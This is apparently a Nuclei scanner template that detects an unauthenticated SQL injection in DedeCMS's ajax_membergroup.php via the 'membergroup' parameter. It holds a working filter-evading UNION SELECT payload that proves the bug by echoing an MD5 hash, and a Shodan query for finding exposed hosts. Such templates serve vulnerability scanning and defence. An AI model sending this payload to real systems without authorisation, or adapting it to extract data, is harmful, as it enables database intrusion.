id: dedecms-membergroup-sqli

info:
  name: DedeCMS Membergroup SQLI
  author: pikpikcu
  severity: medium
  description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
  reference:
    - http://www.dedeyuan.com/xueyuan/wenti/1244.html
  metadata:
    shodan-query: http.html:"DedeCms"
  tags: sqli,dedecms

variables:
  num: "999999999"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '{{md5({{num}})}}'
        part: body

      - type: status
        status:
          - 200